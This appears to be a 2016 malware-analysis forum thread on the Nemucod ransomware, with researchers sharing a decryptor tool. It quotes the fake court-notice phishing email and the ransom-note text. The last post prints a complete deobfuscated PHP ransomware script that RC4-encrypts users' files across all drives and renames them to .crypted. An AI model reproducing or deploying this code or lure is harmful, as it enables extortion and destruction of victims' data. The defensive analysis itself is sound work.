Page 1 of 2

JS/Nemucod (Zippy ransomeware)

PostPosted:Mon Apr 18, 2016 4:35 pm
by maddog4012
came across this over the weekend the java script came as an attachment with the following e-mail message

You have to appear in the Court on the April 22.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can find the Court Notice is in the attachment.

Regards,
Brad Brock,
Court Secretary.


when executed it download a random file with a .png.exe ext

Re: Zippy ransomeware

PostPosted:Wed Apr 20, 2016 2:40 pm
by Antelox

Re: Zippy ransomeware

PostPosted:Mon Apr 25, 2016 5:39 am
by parviz
maddog4012 wrote:came across this over the weekend the java script came as an attachment with the following e-mail message

You have to appear in the Court on the April 22.
You are kindly asked to prepare and bring the documents relating to the case to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.

You can find the Court Notice is in the attachment.

Regards,
Brad Brock,
Court Secretary.


when executed it download a random file with a .png.exe ext
can't find password

Re: Zippy ransomeware

PostPosted:Mon Apr 25, 2016 11:47 am
by TETYYSs
parviz wrote: can't find password
protip: it's on current page you're viewing

Re: Zippy ransomeware

PostPosted:Fri Apr 29, 2016 1:06 pm
by Antelox
New Nemucod Variant. 7-zip is not used anymore.

https://glot.io/snippets/ee7hiif87k

BR,

Antelox

Re: Zippy ransomeware

PostPosted:Fri Apr 29, 2016 3:28 pm
by Intimacygel
Antelox wrote:New Nemucod Variant. 7-zip is not used anymore.

https://glot.io/snippets/ee7hiif87k

BR,

Antelox
Where do we download those variants from your link?

Re: Zippy ransomeware

PostPosted:Sun May 01, 2016 8:40 pm
by Antelox
In attachment the archive which contain the original email's attachment.

I wrote simple python scripts to extract the key and recover the files infected by this last Nemucod variant:

https://github.com/Antelox/NemucodFR

BR,

Antelox

Re: Zippy ransomeware

PostPosted:Sun May 22, 2016 1:31 pm
by Antelox
NemucodFR v. 0.2 is out. Now it handles 2 Nemucod variant.

https://github.com/Antelox/NemucodFR

BR,

Antelox

Nemucod Ransomware

PostPosted:Mon Dec 12, 2016 9:45 pm
by xors
Hello all,

The dropper is a wsf file. The dropper downloads two files, php4ts.dll and a file which will run a php file (a.php). It looks like the php file is doing the encryption. Some strings
Code: Select all
- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.


Re: Nemucod Ransomware

PostPosted:Tue Dec 13, 2016 7:32 am
by Antelox
xors wrote:Hello all,

The dropper is a wsf file. The dropper downloads two files, php4ts.dll and a file which will run a php file (a.php). It looks like the php file is doing the encryption. Some strings
Code: Select all
- If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.
- It`s useless to reinstall Windows, update antivirus software, etc.
- Nobody can help you except us.
- You can find this manual on your desktop (DECRYPT.txt).
- Your files can be decrypted only after you make payment.
0.34008019
1. Create Bitcoin wallet here:
2. Buy 0.43335 BTC with cash, using search here:
3. Send 0.43335 BTC to this Bitcoin address:
4. Open one of the following links in your browser to download decryptor:
5. Run decryptor to restore your files.
All your documents, photos, databases and other important personal files
ATTENTION!
PLEASE REMEMBER:
To restore your files you have to pay 0.43335 BTC (bitcoins).
were encrypted using strong RSA-1024 algorithm with a unique key.

It's the last Nemucod ransomware PHP variant, the one which uses the RC4 encryption; The deobfuscated script below:
Code: Select all
<?php set_time_limit(0);
ini_set("display_errors", "Off");
for ($i = 67;$i <= 90;$i++) if (is_dir(chr($i) . ":")) Tree(chr($i) . ":");
function Tree($p) {
    $s = chr(92);
    $k = base64_decode("MGCQXIq4mcz/0AQ48CBQIFCAiMD4gLDgueobOnOs");
    $a = "e";
    if (preg_match("/" . $s . $s . "(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i", $p) || preg_match("/recycle/i", $p)) return;
    $dp = opendir($p);
    if ($dp === false) return;
    while ($o = readdir($dp)) if ($o != "." && $o != "..") {
        if (is_dir($p . $s . $o)) {
            Tree($p . $s . $o);
        } elseif ($a == "e" && preg_match("/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i", $o) || $a == "d" && preg_match("/[.](crypted)$/i", $o)) {
            chmod($p . $s . $o, 0777);
            $fp = fopen($p . $s . $o, "r+");
            if ($fp !== false) {
                $b = fread($fp, 2048);
                $z = array();
                for ($i = 0;$i < 256;$i++) $z[$i] = $i;
                $j = 0;
                for ($i = 0;$i < 256;$i++) {
                    $j = ($j + $z[$i] + ord($k[$i % strlen($k) ])) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                }
                $i = 0;
                $j = 0;
                $c = "";
                for ($y = 0;$y < strlen($b);$y++) {
                    $i = ($i + 1) % 256;
                    $j = ($j + $z[$i]) % 256;
                    $x = $z[$i];
                    $z[$i] = $z[$j];
                    $z[$j] = $x;
                    $c.= $b[$y] ^ chr($z[($z[$i] + $z[$j]) % 256]);
                }
                fseek($fp, 0);
                fwrite($fp, $c);
                fclose($fp);
                if ($a == "e") {
                    rename($p . $s . $o, $p . $s . $o . ".crypted");
                } else {
                    rename($p . $s . $o, preg_replace("/[.]crypted$/", "", $p . $s . $o));
                }
            }
        }
    }
    closedir($dp);
}
BR,

Antelox